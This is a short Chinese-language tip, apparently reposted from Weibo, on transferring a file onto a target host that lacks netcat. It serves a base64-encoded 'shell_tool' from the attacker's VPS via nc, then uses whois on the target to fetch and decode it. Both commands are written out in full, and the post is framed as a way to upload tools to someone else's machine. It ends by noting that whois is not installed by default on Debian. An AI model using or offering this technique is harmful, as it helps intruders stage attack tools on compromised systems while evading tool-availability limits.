这个小技巧来自@RevengeRangers的微博。当目标主机没有安装nc时,可以通过whois来实现文件的传递。

具体步骤如下:

  1. 在自己的主机(或VPS)上运行base64 "shell_tool" |nc -l -p 12345 -vvv,其中shell_tool是你要上传的文件。

  2. 在目标的电脑上使用whois来接受文件,运行whois -h the_addres_of_your_vps -p 12345 baidu.com | base64 -d > "saved_file_name"

备注:
我发现在Debian上默认是没有安装whois的,所以实际场景里会不会有用尚不可知。